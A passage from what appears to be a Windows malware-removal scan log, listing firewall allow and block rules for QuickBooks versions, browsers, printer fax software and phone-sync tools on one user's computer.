(Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{615C1A0A-96FB-4C74-BCBA-86EFBC622E18}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{20C04246-5172-4363-8699-1F26286E6041}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{8043F567-30EF-400A-B54B-5D7A18D763DF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{2C6BA645-DEA8-4712-8857-38C8C87ACBB0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{646858E5-CC81-46EA-9ED8-327C67D5A156}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6576A075-4A15-427B-BFDB-FDD9C81BD8F3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{699FF3A0-AFE5-4699-962D-887C5D83220F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{8319D26D-ACAF-4963-B5EF-3D9F6FF806AC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{863B10AA-9602-44F0-BA7E-4D4D5131321E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{71E3E8C8-CA44-4F98-97B7-B9877CBF53E9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{429A889C-0B5B-4182-A29C-A382206DBCF8}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{0528EC95-42AE-4ADE-9D38-32D3AB440CA1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{78877C15-57BB-4D03-BCAE-C17BC8129371}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0F88E81D-D7EF-4DD3-9007-C179D5DF8C39}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CCBCA3FB-97DC-4117-B569-2BAB09168B3E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{65B85E1B-000F-42AD-95B1-017E937EFA6C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A45EA53D-DADA-4A56-87B0-5CE5855051C3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{FAD60949-7922-40C0-97AA-FB94FBF3D071}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A31C6E55-438E-4B6E-A6CF-3A5B1A4DC6ED}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{389679E2-7102-499D-BB20-D76F24F9C540}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{12622E24-029E-4787-BBCA-923FA114E638}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{78C47D12-661A-496E-B1B2-661F8A742FDE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{10CA210E-1A43-4BA5-AEDB-509F30784DA1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{19368A2E-60A6-463E-8666-5D181EFBF7E6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{1CED85CB-CFEE-4105-9C7B-EF0533A71EBD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{218BF52B-4827-4512-8A66-1D11104D9BDA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [UDP Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [TCP Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [{E99B5E50-C7F4-44D5-9F28-A7F035E0C62C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{1C1FD5D7-33BC-4E2B-9D85-8A0FE95F8D9F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{69D7DCA6-F14F-4DD9-AA64-D69B0BF38505}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CC276B70-DD3C-4CB8-90D7-5569B20E6509}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{D741D2FE-5DE1-474A-9E0F-0A02ECF2C2F1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{9489BDD3-8E23-4FAB-A47E-BEF81671CAD9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{E5CD524F-9C81-4A9D-A4D9-8CF889FFE043}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CDC6B450-C68A-4FE1-935F-BBE92C8454E0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{99456CC4-A3F3-4A44-8E60-CBC628D0166F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D2C4B9D4-8A0C-497B-8B8D-139BEE93900E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{67B6936A-3C79-4780-82EE-020C22C15BE0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{57C57EC3-2B17-4174-9433-99ED6C3EFCDB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{EC6F2F44-822E-4A60-B213-373D2674A2C3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{F227BD39-004F-4462-870B-E42CF36BCD14}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7B4516EA-BB5E-4C32-B48D-CB77E63618CA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{4F8AACE6-6D87-4BB4-BB8E-CD30BC1B8D5F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E971AD64-E5A9-49C1-9BEC-B99BAE189C37}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{92AE2D3E-E88C-4937-B205-0510D86E3D98}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{9ED98AE6-C258-4291-BD27-0A12A845730A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{416DA705-1481-44D1-8447-134E1B33B4B6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0E8F11B5-A602-441F-8C42-5160B17B3EC1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A7FD22C0-B14C-4500-8F68-37E89E9708A7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{5127C40F-B3B1-4AEB-B51D-1C467861FCEF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{8E77DFE2-0FA2-46E2-A6F3-662963CF817A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{DC1C79DE-5A0D-423D-A2F2-E9B0A03C272C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{6E0E5323-9ED0-4E3F-9330-B17AC2E12E9F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D933AD83-2193-42E9-8354-93FDE931392B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{61F7EE2E-8CF2-46C1-BEC7-C7E5B6A0036C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BDE5709E-2C91-46F5-BBE7-D689AFA5DCB9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7FFBFD8C-66DE-4384-B916-6E628CB5D496}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{3CFDD59B-0936-43FF-8DFD-6CAB1B2E36BA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B8F74F0C-ED26-4C72-86D2-EBB84DE0AF65}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{2D768E31-046F-4A08-A37A-9CAB290FFC21}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D8AE7796-1B51-4B64-B925-74050971C0CD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{DEF6D290-666D-4A4D-920F-177E401B2999}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C3B4D040-2F75-4FED-B5B1-957E0B296E1F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B4AE9E32-6B19-4D67-AE4F-157DA75CF665}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A49DD402-7CD6-4AC9-9803-633C9517CC53}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D3F93373-8075-4037-91CD-B5736E6E19B1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{97ABF5D4-D8A4-4ECA-9652-3F0416AFE818}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{95337D2C-5983-416C-9B6A-E1CAF5FDF5EB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{697F7D0F-5121-4DA5-961D-35A9B31B2B57}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{4A014D40-67FE-4617-A95E-4C24FD6253BF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9DBDC61E-0DCE-42D3-9AFD-C096CC857362}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6A877992-D071-4AD6-9D78-A08EB2632366}] => (Allow) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (LENOVO -> Lenovo) FirewallRules: [TCP Query User{1B8A334E-EEC2-4581-BB3F-2919E383027A}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [UDP Query User{0476BAAC-75C4-4014-90F9-50571E1AC0F2}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [TCP Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [UDP Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [TCP Query User{478564DF-A83E-4790-87F7-2E664BE02F76}C:\program files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files (x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed] FirewallRules: [UDP Query User{7F07EDCD-952B-46D9-8342-28B6DCDA5B19}C:\program files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files (x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed] FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [TCP Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [UDP Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File FirewallRules: [TCP Query User{46351ECE-D982-4119-9C3F-4F3ED6562B2C}C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe (UUMART LIMITED -> AndroidAssistServer) FirewallRules: [UDP Query User{92651D82-4586-4B4A-B74D-AA81D19EB8B0}C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe (UUMART LIMITED -> AndroidAssistServer) FirewallRules: [{071B0A52-8B44-49BE-B1E4-DF2303FB6AA2}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{4CB537D6-B8F5-4F4B-A383-B1945B2968C6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{BF37BEE1-8258-4375-9D33-9C5448918398}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{4BA78CBA-00B7-4B46-BFD3-722654F7DC0E}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{1D6FC334-0851-4A98-998A-796195624340}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{9E10CCC6-1395-40F9-A98D-F795575840BE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [TCP Query User{66829F8A-35CD-4CFF-AC3C-906FADDF9ED6}C:\program files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files (x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed] FirewallRules: [UDP Query User{56D8939D-263A-4635-B4F0-261D1A10796F}C:\program files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files (x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed] FirewallRules: [{0B7F57C4-3E61-42AB-B279-CD83D626ED89}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{E2DA926F-29EA-4B2F-A29B-DCF7ACC8B68D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{EAC396DF-7539-4AA6-BB14-F241204CC0A8}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{92C1B03D-8473-40B1-940F-DE34B8C3F4E8}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{8065ACAA-FFC0-4D86-AB31-2F938DDAF7DB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{90F85476-7FF7-4668-9784-5AB7CBD9A438}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6366B856-CEFC-43EC-BE3A-38498D760ADE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5AF0734B-F7B4-4304-878C-718444874B86}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{45F609D2-9C7A-4DE5-B502-61CF8405BE74}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{353F945B-F491-4B7B-9811-4C1370BDBD18}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{393FD0DB-504C-410E-B7A2-52E009DFEE59}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{BD988951-1E16-4B02-80C6-B3D20E1F5EA4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{1813103F-3CE9-4485-AFB6-319EC756F853}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{94A7F822-F83B-4738-A7AD-C45305090C9B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{81360C52-0920-4E77-8F84-7ED6C48032BE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A2E36B23-B416-4400-B5C1-676BF5357ED3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{AC5E946B-CF83-4E8B-BC81-1E8D59764146}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{9A8A86FA-1274-4448-BABD-EED5A3343A68}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{039E41D9-4C9D-4AF6-AFF7-3C6E72D454A3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{FFDB9DA3-5085-446D-85D2-3D78331DA4E4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{682DF444-63DB-4D18-8025-644B363C71BB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E431620E-6269-42E9-BE7D-7765F18DE413}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{BAA5C529-E7E2-40AE-8A64-72F1B011252F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D31CF02C-E1AE-4738-B11D-3497652420AD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{31A6337C-EB3F-428F-8121-5689F5B86715}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{8C7A54AE-4564-4BAF-B838-01A6602C0791}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6BD50263-D501-4AB0-A031-7C59A67D360E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{668B8C95-51C6-43C6-8DB1-E67931311B63}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{88E8CA11-1849-459A-BCEA-E3725A42C642}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{98F43435-D152-4EB0-90C7-F9344C93E352}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CFCFDA93-9E58-4A93-A6F6-34D6E9877EEC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{3674C094-1C44-469E-961C-0B555B099B2A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9A30D067-7291-45B0-A7FC-9E51D37B2981}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5E994BE9-FA90-4C43-8D84-6716917313DC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{64F02A9D-AFDD-45D4-8558-07EC554774DB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{163B5FA4-F8D4-4A74-999C-12EA73049CA9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BABBE6ED-D11E-416A-B087-1BF61FA724D8}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6D36ADBC-80EE-4150-859D-05DF8024BCE9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{AD36C0D4-15D5-4413-91A2-C06A964F0420}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B79BC76F-00AB-4AD0-A233-74128CD869D2}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{0112E7BB-6B24-4508-B001-5CEE0FE3730F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{8469BBE1-9982-4D92-AF77-C6FB253BCF00}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{4B0BF735-C11C-4E26-9095-C467E6EFE645}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CF9592EB-4598-4B04-8908-5A9D4B37BEB9}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{3EFD4456-1698-4B3E-BFEA-830DE00A0652}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{8FF599A9-E9B5-439F-B4EF-B3E7790AD89C}] => 